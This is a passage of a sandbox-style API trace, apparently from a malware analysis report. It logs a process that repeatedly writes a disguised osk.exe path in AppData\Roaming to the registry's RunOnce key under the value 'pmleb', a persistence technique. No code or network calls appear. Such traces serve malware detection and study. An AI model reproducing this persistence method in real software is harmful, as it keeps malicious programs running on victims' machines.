lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.925] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.925] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.925] RegCloseKey (hKey=0x280) returned 0x0 [0081.926] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.926] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.926] SetTimer (hWnd=0x20280, nIDEvent=0x20d0, uElapse=0xa, lpTimerFunc=0x0) returned 0x20d0 [0081.926] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.937] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.937] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.937] KillTimer (hWnd=0x20280, uIDEvent=0x20d0) returned 1 [0081.937] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.937] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.937] IUnknown:Release (This=0x787518) returned 0x1 [0081.937] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.937] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.938] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, 
[5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.938] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.938] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.938] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.938] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.938] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, 
[5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.938] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.938] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x55 [0081.938] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.938] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x56 [0081.938] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.939] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x55 [0081.939] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.939] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.939] 
IUnknown:Release (This=0x7a9740) returned 0x1 [0081.939] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.939] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.939] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.940] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.940] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.940] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.940] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.940] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.940] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.940] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.940] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.940] RegCloseKey (hKey=0x280) returned 0x0 [0081.940] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.940] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.940] SetTimer (hWnd=0x20280, nIDEvent=0x20d1, uElapse=0xa, lpTimerFunc=0x0) returned 0x20d1 [0081.941] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.953] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.953] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.953] KillTimer (hWnd=0x20280, uIDEvent=0x20d1) returned 1 [0081.953] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.953] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.953] IUnknown:Release (This=0x787518) returned 0x1 [0081.953] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.954] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.954] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, 
varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.954] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.954] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.954] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.954] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.954] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.954] FileSystemObject:IUnknown:QueryInterface (in: 
This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.954] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x56 [0081.954] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.954] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x57 [0081.954] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.955] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x56 [0081.955] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.955] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.955] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.956] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.956] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 
0x0 [0081.956] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.956] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.956] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.956] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.956] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, 
lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.956] RegCloseKey (hKey=0x280) returned 0x0 [0081.956] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.957] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.957] SetTimer (hWnd=0x20280, nIDEvent=0x20d2, uElapse=0xa, lpTimerFunc=0x0) returned 0x20d2 [0081.957] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.968] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.968] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.968] KillTimer (hWnd=0x20280, uIDEvent=0x20d2) returned 1 [0081.968] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.968] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.968] IUnknown:Release (This=0x787518) returned 0x1 [0081.969] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.969] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.969] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | 
out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.969] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.969] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.969] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.969] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.969] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.969] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), 
ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.969] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x57 [0081.969] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.969] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x58 [0081.969] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.970] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x57 [0081.970] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.971] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.971] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.971] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.971] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.971] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.971] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 
lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.971] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.971] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.971] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.971] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS 